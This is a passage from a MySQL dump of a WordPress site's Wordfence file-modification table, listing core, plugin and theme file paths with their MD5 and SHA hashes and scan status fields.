(0x2b620a92cb4466b05832c08687599943, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php', 1, 0x00000000000000000000000000000000, 0x649de5e0533abf2d4ec02151ddfb3022, 0xa736cb293f99f28b155e2246d22a05a9677cd2ce26c5db52d5cea004e1dc0009, '', 0, '?'),
(0x2b6f9fd0f4d197baef548540ce950a5a, 'wp-content/themes/Impreza/framework/templates/elements/btn.php', 0, 0x1034ec8b58bb7a5a590c39957db83e72, 0x1034ec8b58bb7a5a590c39957db83e72, 0x8126318df60bcb152e0d3a9ce963ff37c86b561ad0676f8f2a44888c52250a5c, '', 0, '?'),
(0x2b6fe2f2404aaec3dcd543536a14a104, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_8_24px.svg', 0, 0xecd3e35278a93fef8228a794c6d6f29a, 0xecd3e35278a93fef8228a794c6d6f29a, 0x09fa5ddd081569db148b7705ed172c145c0db8071ca0c12abbd5446a946b922c, '', 0, '?'),
(0x2b81b58f4ea7a7456a50e25dd02fa785, 'wp-content/plugins/revslider/includes/external-sources.class.php', 0, 0x0bbc76f3ea3eb4d0a41209b4162daf4f, 0x0bbc76f3ea3eb4d0a41209b4162daf4f, 0x5e5fc1dda201db829fedc1e0aa0d6cb350f83db67e57020e42585d6cc647256d, '', 0, '?'),
(0x2ba7aeaee44189299806b3f70cfede6c, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg', 0, 0x94074d2d6aa6aa3df7aad1b5621467e5, 0x94074d2d6aa6aa3df7aad1b5621467e5, 0x8353492397b3128bc7eab170d477380aaaf381914f7681a9cf605c14ef78d606, '', 0, '?'),
(0x2bb3a718472a23f4b1edf4a694fd66b4, 'wp-admin/network/site-info.php', 1, 0x00000000000000000000000000000000, 0x658ea1792f51ab6454a5d2c0bff752f9, 0x85b1a778171ed2bca79699cfd6175abaff8a3167569a53028f59186162ae1712, '', 0, '?'),
(0x2bb41a44808d965a0e65147d018fc904, 'wp-content/plugins/wordfence/views/onboarding/plugin-header.php', 1, 0x00000000000000000000000000000000, 0x13c8f46b51fc8534839bda8ce274532a, 0x86db51689d390037151801f28a924d13b9b9eed24ed3dbf6361f34893ed85c13, '', 0, '?'),
(0x2bbfabd86782deea883b6b967cfb92a2, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/admin.js', 0, 0x8d566a551bb63e6e81a4c6ab3772ff8e, 0x8d566a551bb63e6e81a4c6ab3772ff8e, 0xda0cea9e2522c79b5730068b9214a915e9267fe1a7669a65b5fb8967f4796efe, '', 0, '?'),
(0x2bc4e3f874a825523fd2db08f5f8a0cc, 'wp-admin/network/credits.php', 1, 0x00000000000000000000000000000000, 0xa1be54253e72acd96ce6317127e5a5c0, 0x3c439225c6393eb98cbbf720fc3d1cc5fd7fdeceeac48ca35ad149f00f5fe9a3, '', 0, '?'),
(0x2bf7089ff3695f6fb17bac4b585ce464, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/brain.svg', 0, 0x90d6f858aba1fc2eba3241847d074e67, 0x90d6f858aba1fc2eba3241847d074e67, 0xde4d7e2fc7549928d8a042bdf2d67d6283f025f99ed0e61c1c138c03b6f67e70, '', 0, '?'),
(0x2c03e77aeca3641adfa1378812223752, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg', 0, 0x182e6a381e245fbef24bfe78d1a878d6, 0x182e6a381e245fbef24bfe78d1a878d6, 0xee5fa31a9519086f0a7cd1bc003414cd20f29ce18976dbadd0b5dd0bc8f6d79d, '', 0, '?'),
(0x2c06e00f1abc4a271baa7f41576880cc, 'wp-content/plugins/wordfence/views/options/option-label.php', 1, 0x00000000000000000000000000000000, 0x0796b0cb60f19a7f4cf49602936766e5, 0x0efcfb5fb40d00ac8ebdbcff00b05a7df0e87d29765b34ae96c201bcecf11e8b, '', 0, '?'),
(0x2c261095178dce04b710ae564d2e0684, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg', 0, 0xa5fd75bec0f606898f7e2fdaf5641aaa, 0xa5fd75bec0f606898f7e2fdaf5641aaa, 0xe2210509e6baa970d69fe8c6bba7661b6e3d4b66dc1f84dbfcbb6e5b594de042, '', 0, '?'),
(0x2c26b80707bd2e3575f7536fbdb19e58, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser.php', 0, 0x6fed9cecd9d32c3a3e5bac5a1ab59af1, 0x6fed9cecd9d32c3a3e5bac5a1ab59af1, 0xba115a85a96b35adf47c7a6170192175658a439fa96dabb0bc23b02d2ca18b4d, '', 0, '?'),
(0x2c35bc7359c7283f2a6a8afdaf66bac1, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg', 0, 0xc13eb732ddca2090d8004a5278a6b4cb, 0xc13eb732ddca2090d8004a5278a6b4cb, 0x17f51af70efc9946caefe170299cd42806852910fde70c1c2a1bfd7157a5212c, '', 0, '?'),
(0x2c3c930caa20df3f17435de1300b418c, 'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xcdb6a59abe551818e8a3a6d61b68e00e, 0x8fef6568d3a78326ceadadfb41b5331f91062b575468c183150a1a29c83fffff, '', 0, '?'),
(0x2c5d274ea625dd91556554ad82901529, 'wp-includes/js/dist/annotations.js', 1, 0x00000000000000000000000000000000, 0xe1bc9760ad82c3b9169ecabe8b535bba, 0x4229e73eb017561b23769b4b11e5143d36e4d841f21622bb312c47ccbe3a5f29, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x2c63081dbea22a51b9b735d7cf0bd5b7, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_voicemail_24px.svg', 0, 0xb2e33750e38959ce373c3348b17ff6b2, 0xb2e33750e38959ce373c3348b17ff6b2, 0xa1a6fcc21157c2eafc0789ded81f730fe1c785bb42b7442bcdfb17c44923ccc9, '', 0, '?'),
(0x2c7ad865a9e0fa590c23754a7e5b500d, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0x204f700c527b01fcd2b58ce747dd8ddb, 0x1993115992fc3a4286e5c550351b4d9080735f860cbcb19ab92ed986fad68e90, '', 0, '?'),
(0x2c86e1d440b59a686ae47172de9202ff, 'wp-includes/ID3/module.tag.id3v2.php', 1, 0x00000000000000000000000000000000, 0x16d0e64cc4c3998d52203076d5673929, 0x6b2fe1eb542109cdd8267079e2e978d94be2ef685478411cdbf2b7e7474b8b7a, '', 0, '?'),
(0x2c8a27c15096b4a63ffde8e143ec759b, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg', 0, 0x204f61a19eb3371c4df719a3ef5b957c, 0x204f61a19eb3371c4df719a3ef5b957c, 0x7904adf701f6fb0f45e1906d71d18629188c47062bc22377dc5aa19734f6ddb9, '', 0, '?'),
(0x2c8a68c983733f030f34425bcb5ed59d, 'wp-includes/SimplePie/Cache/DB.php', 1, 0x00000000000000000000000000000000, 0x0659bf084f55a303f5922edc62bcfbf6, 0x03c2fbd064d52a59d7c2ae1fa303be73a7e5033c2129dc83ab854a90d8c2ac81, '', 0, '?'),
(0x2ca2a8ebdc63ef3406e78fa24c35e1b8, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_round_chart.js', 0, 0x476cdbe69aeec719e3fbb0bcd2909f38, 0x476cdbe69aeec719e3fbb0bcd2909f38, 0xa380ee3ac4930c573aa02a9332dc62b1f92311f748dbad2fe61b1d71e3973f69, '', 0, '?'),
(0x2ca62514cf23b9e148dc52b77489b4fe, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js/us_icon.js', 0, 0x069fe5303b21992dd6d1d7b1798a9f1c, 0x069fe5303b21992dd6d1d7b1798a9f1c, 0x201c3307249d038194bbf98e6ab4cb1d284b31b305b443ac7fe5b8414a58acae, '', 0, '?'),
(0x2cb5c0b00c97e4c7ce6c53a70ea49d72, 'wp-includes/css/dist/editor/editor-styles-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x4a98fa4de2c4af7e9ecfedfde88e80a1, 0x87ca753bb05644eb99cec1636d5748ecb6ee1dd1c9d2274b07fa10671152fc0a, '', 0, '?'),
(0x2cd625af6688f86ec4cd87e714d9badc, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jquery.sticky-kit.js', 0, 0x504da41dda2b4f6aff37d87fe488ec52, 0x504da41dda2b4f6aff37d87fe488ec52, 0x028be311757fec0ef178ffb5e72129057a851d979d0d313aaa62ecc89e753688, '', 0, '?'),
(0x2cd7c5309995ddf4bcb56d4a4a991eee, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Font_Manager_Param.php', 0, 0xfee0cc489149199750e15693c63eb913, 0xfee0cc489149199750e15693c63eb913, 0x5e048ad4e0beb6f8b8f855ff6b84de485beebe01d84da35a236c3669cfaa47ad, '', 0, '?'),
(0x2ce6c969def9fa3c283e08750c3226a1, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg', 0, 0xbe2c25490dcbeab8e100cdc3b4fdfc5d, 0xbe2c25490dcbeab8e100cdc3b4fdfc5d, 0x66f889f2ee74ef7ca2f10a58cab88af3eb5c876452ea11571c54746b4dd663b1, '', 0, '?'),
(0x2d0cc5728fd27d8aae8ada04ef60e95c, 'wp-content/plugins/Ultimate_VC_Addons/admin/map-settings.php', 0, 0xb4aac42376a58918a2075260b7d1273b, 0xb4aac42376a58918a2075260b7d1273b, 0xab2c91e1e8fd9c8bbb691c80f2f1c081d7cf6d57f36248bb4b8136e152a26be5, '', 0, '?'),
(0x2d1bd108802d71e5570802179a1f1e2a, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_video.php', 0, 0x69f4b2506e4a126c9a52d086bd065c09, 0x69f4b2506e4a126c9a52d086bd065c09, 0x1546774a1186f5f615a3cb168fc92e62f3d459c8367839137703f25785515479, '', 0, '?'),
(0x2d2dc4c3bc819624ae293b1d86c44a35, 'wp-includes/js/dist/rich-text.min.js', 1, 0x00000000000000000000000000000000, 0xaa5eebad40c9c789bdb3cba2e188b214, 0x305dd634ecf14aa4d3c1ab28bc7270be4e1596445788b91afa40123732f1262e, '', 0, '?'),
(0x2d2e63585fb153b00b2bbdab03a98247, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg', 0, 0x4bbaf6dafedee2c80bface485952f300, 0x4bbaf6dafedee2c80bface485952f300, 0x62cc7dca6c65f59538be77ddf6d1e272b2c3e738c70e861c45d082789c208af6, '', 0, '?'),
(0x2d316f1989e4b2c4aba50e26f4f24cad, 'wp-content/plugins/revslider/admin/assets/images/sliderselector/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x2d374f016e05577645b4aa9797c318fd, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg', 0, 0x017a0485304ebe6f2cfb672b6a47a3a3, 0x017a0485304ebe6f2cfb672b6a47a3a3, 0x40a58def68394b353cd0919ac10810dc203d8b4b1f09f9bb8ca16a0c18308922, '', 0, '?'),
(0x2d59c910914dc827244e5712bd7e9f8f, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg', 0, 0x383b357ac1fc09a24e8c132337272b00, 0x383b357ac1fc09a24e8c132337272b00, 0xe2fac24b39057e140515c4420c902614f69cc3585876640eaeae7d7172f90c5b, '', 0, '?'),
(0x2d5cac8b5bd716b5b98610e84a92d7a5, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php', 1, 0x00000000000000000000000000000000, 0x46e19231aaa3c609dd4d9ce7e1c85dfa, 0xa4eb4138dede7b8021a7f25699743c53908a7148a96f68de3486a5796042799b, '', 0, '?'),
(0x2d6adea7ab209aa0cde612a67e687962, 'wp-content/plugins/wordfence/lib/menu_support.php', 1, 0x00000000000000000000000000000000, 0xb07979308c274fc966818d78323bf544, 0xf9d11c2e468921788903822c709f858d09c0975b27bb45881e1accbb19c42ca3, '', 0, '?'),
(0x2d6b64cfaf8d91aa58df775c379fc0af, 'wp-includes/admin-bar.php', 1, 0x00000000000000000000000000000000, 0x0eea95c964fb5a7b990527a26dec3990, 0xdd47ffc1b56ca800e648224cb345ba618629f009e5cc2c7822a64bcb5f19647f, '', 0, '?'),
(0x2d776dad97f860476784be432311e5cf, 'wp-content/plugins/js_composer/include/params/href/href.php', 0, 0x94c05a1fc042907e3b87844fee913e91, 0x94c05a1fc042907e3b87844fee913e91, 0x52b9093731b12d9ccafd29d6823b272cf2f2cc78eba8a93e40e6a0c9016705e4, '', 0, '?'),
(0x2d7fb2ead118e111c7b88625773df5e2, 'wp-admin/css/colors/ocean/colors.scss', 1, 0x00000000000000000000000000000000, 0x1a7c5bfd9faf7f6cc77cd9b166062568, 0xc318c9aebbfa31d4755a52aa48d136adb249e9c10d09d0c5baf4879688dc1542, '', 0, '?'),
(0x2d869a8e5fb5b5e66d0c712babf73194, 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php', 1, 0x00000000000000000000000000000000, 0x68e3a0b2edc4c86912b465a095c9a114, 0x4948f84d705c87e6f5ff4ead680ad7884e159abc463d2dbb931cba5ad83d684f, '', 0, '?'),
(0x2d87ba2937a63579b03863dae25776d8, 'wp-admin/about.php', 1, 0x00000000000000000000000000000000, 0xb22ae16ded3d754fc932c43c38531a54, 0xe4de37be36ce900b924fb89fcba598b5137b285fd6f9281fff81a398922b7334, '', 0, '?'),
(0x2d899ab379d1bd820ccddb0117954d72, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/range-slider.min.js', 0, 0xc2249bbaeca15f9536eb893e635b301e, 0xc2249bbaeca15f9536eb893e635b301e, 0xc084a23eba0cf48d245dbd914441b7bec15abb3e0bbc396f0bda12283c854182, '', 0, '?'),
(0x2d8a5fbad72bcdd405590b6ea813d953, 'wp-includes/js/jquery/ui/tooltip.min.js', 1, 0x00000000000000000000000000000000, 0x26c741acbef3207eb8c79483cbc08dde, 0x401fb96a8ce27315c4b5034d93bfad90d742a578f59c22db725903812ad2e6c0, '', 0, '?'),
(0x2d8e1666e2c8345ddb23227512b8b36c, 'wp-admin/css/colors/light/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x6ac1f0dff2731afc92b387bf90bcbfe4, 0x2428ce90b9d047f39bcb7f8f3bc0e8015893e74b3705cec93bd7f1715bf545c1, '', 0, '?'),
(0x2d974864c202b6fd09908732f4963919, 'wp-content/themes/Impreza/framework/config/sidebars.php', 0, 0x3b049cbec7b4de1363dbeb392526e451, 0x3b049cbec7b4de1363dbeb392526e451, 0xd55af04578b5901ae60e3d368106b640646ecec452cb2e97b62514d738b6ce7c, '', 0, '?'),
(0x2d9ce79fe89782a08715597b5d6e7383, 'wp-includes/css/wp-pointer.min.css', 1, 0x00000000000000000000000000000000, 0xbfbbb17f5deaa73a3fffb7c639aca12e, 0x97b50e0629b26367f02dc7e81cd1e25b4c2a0ac36985e70cbcf2177a3e7cd490, '', 0, '?'),
(0x2db9612f9d709d3b28749c71df1a0ad0, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/slick-custom.min.js', 0, 0x338334dd8712e5e5f9f9f14aa3af8254, 0x338334dd8712e5e5f9f9f14aa3af8254, 0xd4708282fc79f3b20a1153f1bce426485455a9464e7c58266f48981d3f24ca81, '', 0, '?'),
(0x2dcd644193a3f9bf7f8dd6d41ea51509, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php', 1, 0x00000000000000000000000000000000, 0x6a3f3c3164065c88ecbc363493d4fe15, 0x5ade6f5f134fbf8ccb31188f27b38829eac2f7bbb173ee09183eebf10aa8341e, '', 0, '?'),
(0x2de551a767e76d80ac550d4f2bedcfe9, 'wp-content/plugins/js_composer/include/autoload/vc-pages/pages.php', 0, 0x52a15ca51a0eed94b9a6a9e651a7ca00, 0x52a15ca51a0eed94b9a6a9e651a7ca00, 0x8a0f21dfadbac4066ebd8be1bfce37808b8441c03b295ad8683b984d37467589, '', 0, '?'),
(0x2de7ba96c42822c343c96aebfcb20492, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg', 0, 0xb948063bac7b658cb769b63ab8902a8f, 0xb948063bac7b658cb769b63ab8902a8f, 0x85dfca8699fddf1f9ffdb763f70975fffeddace00e84eb249cb471a0e92240af, '', 0, '?'),
(0x2e1e2d87f6ff8f5c2ef2fa87def772eb, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg', 0, 0xb753f6de16941716828341d840fd8567, 0xb753f6de16941716828341d840fd8567, 0x228a36d11ceb3d83d041a13cf9d3a6c5b9b029d31f96b9cf16ed22e5bcfd459b, '', 0, '?'),
(0x2e20d3005f6f45ff5d41b55fd430504a, 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js', 1, 0x00000000000000000000000000000000, 0x640cbc0058638c4fb0400370dbcf25a3, 0xd06f4c944e1feabca8e54f94b7a928a1531eb8cc93cf772d178c51076994a6f2, '', 0, '?'),
(0x2e4968559c8e0ee2338ebf2b421a84bc, 'wp-includes/images/admin-bar-sprite-2x.png', 1, 0x00000000000000000000000000000000, 0xeb51ac1312eb060b9bc638fef46f80ca, 0x2a45b0e3c05473fcd9e5a3616ce4895ec770b8dc055889afe6a15a1f00901cf9, '', 0, '?'),
(0x2e78be8ccfaedffa3785d716fcfa5fce, 'wp-includes/js/mediaelement/mediaelement-and-player.js', 1, 0x00000000000000000000000000000000, 0x16a432e33da81058ca49c643cae0c318, 0x6052cf5193c028326816133e7275fbe839598cdfadb38ad9c9db8ec097fd09a6, '', 0, '?'),
(0x2e88e9ba89024430038975a94c2d6395, 'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php', 1, 0x00000000000000000000000000000000, 0x42c87c7373476f31bae5ec0703b21778, 0x0a39565720808392b4987c3adeed5d5cc7e529bb90a0ebaf64890f5e55d30e23, '', 0, '?'),
(0x2e8a59172c3d90ad089d85309484fa1b, 'wp-content/plugins/js_composer/include/autoload/vc-single-image.php', 0, 0x5022c2e837720725693d83686bf40cf1, 0x5022c2e837720725693d83686bf40cf1, 0x17fb361e05d21f07e529a073e3643a4df852e65586f30044162e9b5470925715, '', 0, '?'),
(0x2ea645c71d5b4af5cf6c039e781ddfe3, 'wp-content/plugins/wordfence/images/forward_disabled.jpg', 1, 0x00000000000000000000000000000000, 0x4d5fdad65a3fda4e29bad28aea3adc35, 0x9bae802fdf3c3e4f26df1d06c8950e1715034a521c1fdd8765c47d9a28bb9b6d, '', 0, '?'),
(0x2eb4d737d166f37739506d40a5a6eed1, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php', 1, 0x00000000000000000000000000000000, 0xcfcf309648e7230bff494844f1e7f394, 0xdb76986fc2561b5978843f9884e40adc1fd50a2633632d150dac38ee076da5b8, '', 0, '?'),
(0x2ebc8079a5e3ed1989c77db792d3e3a6, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php', 0, 0x8ba9680f626372393235917af0443345, 0x8ba9680f626372393235917af0443345, 0xf8490ae3bff0ab09799ef87f0574b77c8b9d6938dfb319a47179a4da1c204947, '', 0, '?'),
(0x2ee688ca514a0ab2a8d629e0de9be9b7, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php', 0, 0x1c701ab2052ae21f50416c2d3fdb3ce1, 0x1c701ab2052ae21f50416c2d3fdb3ce1, 0x32acfca2e19f67fe3a4e11c442013d90657c605978e24fbeb9a84faefe9b9634, '', 0, '?'),
(0x2eefeb6fc39e1eb7cd5b6f4404e5e5ba, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php', 0, 0x088f310520db3381911835419e3a3940, 0x088f310520db3381911835419e3a3940, 0xc3b5826ec9f3bd5bf247656282fee641dfc23d647a091396c8c0a7f470b93d07, '', 0, '?'),
(0x2f2a3abaaabb946f3ea9749a8eabeeaa, 'wp-includes/js/dist/autop.js', 1, 0x00000000000000000000000000000000, 0x31e1f40e1156574c98fc4b0cf735857a, 0x39853c643d8ecc44e45a9f9dae7e2c887173b172cf98b541881f6f7595b1ac2a, '', 0, '?'),
(0x2f38ed0b1fea0b50b5d5250bb024dfb7, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_games_24px.svg', 0, 0x1409b6878c705493133d32c5651a8524, 0x1409b6878c705493133d32c5651a8524, 0x5bb07477ddaba2916a506585573eb7c39c050eb5bdc19363e4a6342758e86109, '', 0, '?'),
(0x2f3cd8a75ec9bc667d9622d7f8fb24b8, 'wp-includes/images/media/document.png', 1, 0x00000000000000000000000000000000, 0x76e5349938f6ce9179931436de1c64a3, 0xa6edc3b8601899d9fb9d0eb3e7e1b1ed66094924205f5aaa589722300db4df2c, '', 0, '?'),
(0x2f616605773dabd83f1a3650a4c149fb, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php', 0, 0xfc9d021f89e5f2a9a367f6c6bc1b267a, 0xfc9d021f89e5f2a9a367f6c6bc1b267a, 0x6506f045855424ac63040fd9fbb7d8b7a1f45dec80ba56563ff32e13e5b03052, '', 0, '?'),
(0x2f66e48cb45e9860e7341ee522b2ce36, 'wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php', 0, 0xcac59099b57a1ed4fdd0ba69504c49ce, 0xcac59099b57a1ed4fdd0ba69504c49ce, 0x80f5df25d18656bb93e74609bb1a1e2fff13b39ff5fd821c235146455481f884, '', 0, '?'),
(0x2fb2fe7de3a6bf4c05fa3b3fca14775c, 'wp-includes/Requests/Exception/HTTP/401.php', 1, 0x00000000000000000000000000000000, 0x3b2ab80eb9cbfd87baa23fc1648e9940, 0x590f56241789f3c4ff2fef1da59f403db2f785c3ee19bb562dbdd80e64630eb0, '', 0, '?'),
(0x2fbb73bbb543348c98e0d6c0108f809e, 'wp-admin/network/setup.php', 1, 0x00000000000000000000000000000000, 0xce74e43d24d9c36cd579e932ee94b152, 0x5188170a15e8cc302e73dbf924e49af6f1980e85e1c801ea63a69822745a5eac, '', 0, '?'),
(0x2fdcaabf12189d0528d69001e5ba9c55, 'wp-content/plugins/Ultimate_VC_Addons/admin/index.php', 0, 0x311b7e9f4ee6149bebbeafbe61baa4e8, 0x311b7e9f4ee6149bebbeafbe61baa4e8, 0xeb3af5ea9ee14f0127e2dd719b88c2ecd202e700f255c854537bf0fdb6ce8e90, '', 0, '?'),
(0x2fe9b9a0ecc4efceb01f31ca697787a7, 'wp-includes/images/uploader-icons-2x.png', 1, 0x00000000000000000000000000000000, 0xadc1e7b0262d80e44f18a287c395cb7e, 0x9486a4720feb1e7f0087b7cee8275f3e0e85f136e7c65157bc8c34daa052ae89, '', 0, '?'),
(0x2ff27ca41ce7da80ae1bba7f34830162, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg', 0, 0xdb4a7e8d845df69edcaaa6a484501f2d, 0xdb4a7e8d845df69edcaaa6a484501f2d, 0xa90c3d15532dd618011cf03f76516c50986361a6965440a6590f5fed4f27aaee, '', 0, '?'),
(0x2ff7a1f5e2e935535155dbb676022bd4, 'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php', 1, 0x00000000000000000000000000000000, 0x6bfe7f89051795f77537d42e463c0eab, 0xa38a8c7033773bae4da333088ea8d13d8b016d98e886c153f4914d868286ad08, '', 0, '?'),
(0x30040c635550fc655051b1fb9d9fd3d1, 'wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php', 0, 0x91b17657b1e777d4375beda8c1d9168d, 0x91b17657b1e777d4375beda8c1d9168d, 0xd0fc9c4005f5c4fd5e2f91c84375ba8e88646199130c9e8b0a907fa3dc0447ba, '', 0, '?'),
(0x303c9211cec5c8ff6cdabffef64aade2, 'wp-includes/js/wp-backbone.min.js', 1, 0x00000000000000000000000000000000, 0x643ca3336f29d3cab7ce9dd7da8bc2a6, 0x00ab0ede03ff2b434647be9a6c06809cad6cfa0889fd0af13a2451bebc83de8b, '', 0, '?'),
(0x3045871ac523677a5a531f8468407d03, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg', 0, 0x16c819cd494ef9ec7dba303df54f4799, 0x16c819cd494ef9ec7dba303df54f4799, 0xf52133afb15e76c96571dba99d65e4923a2f2757f33bf377fa8dc0ca4a593d0d, '', 0, '?'),
(0x305d8119714b27fb669878c1bbcfe3a8, 'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x4c927b02ec9bc57017eab8d7b6dcd2a0, 0x9fca6df6e6be91c85bd2533312c3dd27f84a1b1fd32ad5e5537473c46adbd6e7, '', 0, '?'),
(0x306aef56c6bdc9663a8a3586e760955c, 'wp-includes/js/customize-selective-refresh.min.js', 1, 0x00000000000000000000000000000000, 0xfcac029c576eba52ee643630959205b8, 0x98673defd06a20939d95de164b59233273ae7db4ea2750139322421dfd37e007, '', 0, '?'),
(0x3078df1168fdd7cdad4b94fc33f9f754, 'wp-includes/class-wp-fatal-error-handler.php', 1, 0x00000000000000000000000000000000, 0x75d9d27be814fcd2d1a0c68ad9df4496, 0x887588cfc8758c169f8ea1025af5546508ef7d86905af63e6b8cd2d3a61ab0df, '', 0, '?'),
(0x3082f2beae8972f20f5e923ffb6c417b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg', 0, 0x2d8ce41dcf7eda3b0100408e26c67ef8, 0x2d8ce41dcf7eda3b0100408e26c67ef8, 0x5a75a0cd3ba29a03057483ee6aedff0deaeb75d0122eb19f2e412ee9aa4c1884, '', 0, '?'),
(0x30a4e780c54500308c82108158cf4812, 'wp-includes/js/colorpicker.min.js', 1, 0x00000000000000000000000000000000, 0x71131b3bc63bacef4c40b16235c5e735, 0xd7e57b2ca6d60022bf6458db17e72a1fe41957733275a3ceaff570598ad93617, '', 0, '?'),
(0x30b185466a2fde2dde4d0072a3cb90f5, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_short_text_24px.svg', 0, 0x9915536464e2819ff1eec56ed6ebb0d2, 0x9915536464e2819ff1eec56ed6ebb0d2, 0x1784200849754851cd1691a97e2f1edf6237ed64f5f7d56d5693ccee080a6cc9, '', 0, '?'),
(0x30d064dba65a50c9f832f11ebe6feb88, 'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php', 1, 0x00000000000000000000000000000000, 0xddfc75d8cb6107c07e0608c876c0dd08, 0xcbf92f5b2bf017a22129bce366bf04e068820466c4b3e958c04638b9aa2f4837, '', 0, '?'),
(0x3108762f2e5956550eb0c9609ea714d8, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_24px.svg', 0, 0x0bff27feb544dacf5db171e661ab4e4a, 0x0bff27feb544dacf5db171e661ab4e4a, 0x8150aec64fd171e7457ee57fae1e16c32791baf0530b9ab62ac80fa4793a4db9, '', 0, '?'),
(0x3126a3d48d30d9182f92d44a28a53f4e, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js', 0, 0x4eaef55fafebba54f558425059e811fc, 0x4eaef55fafebba54f558425059e811fc, 0x3002d28cf5f54e74b4612d1da645ed333ecb11c550e1a2e91e22c98b22efad27, '', 0, '?'),
(0x312d4205327fbcde74b635cc018a358f, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php', 1, 0x00000000000000000000000000000000, 0xe588848faee1a322b90fa1ecfc91f30d, 0xc37bf282ddfe462c5b831e7f31499d0fe461721f480888923f0531727005a035, '', 0, '?'),
(0x312dc014fff5eef8d718673937b9e5d7, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php', 1, 0x00000000000000000000000000000000, 0x236647ab0dd682b78b42eeac9f672030, 0x91bc63de28b18c1ca2bf6b04319e86ede1faee9532825177340bfbca1b053f30, '', 0, '?'),
(0x313ad110c47724d8ba7956dc2f1b3e05, 'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1579191227.js', 1, 0x00000000000000000000000000000000, 0x38399d22ebee7a7af8c256762aced85d, 0xabdb8625256ced3a4ac4663cc86271e3c5509d96c2507419cbaf7ddf9d22d566, '', 0, '?'),
(0x313f6f9c78f81b13e73cc83fe9cde236, 'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php', 1, 0x00000000000000000000000000000000, 0xbfdf229ea13579972022cf0f12278a66, 0xea9e6167c04c5353505596b5be0bb9053afd9085b0cc88897035513cc13e4672, '', 0, '?'),
(0x316fe7ee37848df92454d4816072821c, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg', 0, 0x523cd36a4e7fbae98e35cc4f12b176d2, 0x523cd36a4e7fbae98e35cc4f12b176d2, 0x0ab9dfb592af3f901ffa23a79214f01525bab277ed0e28d3170b37fcb15f42d1, '', 0, '?'),
(0x3173b82936aad3b69995af43a785ce97, 'wp-admin/user/admin.php', 1, 0x00000000000000000000000000000000, 0x978c72880bc9dce93e59d1c851f96467, 0xb9d9a36aa77491cc1afffef5ecf68196b52f909f3cd7071f1da30d9436db3894, '', 0, '?'),
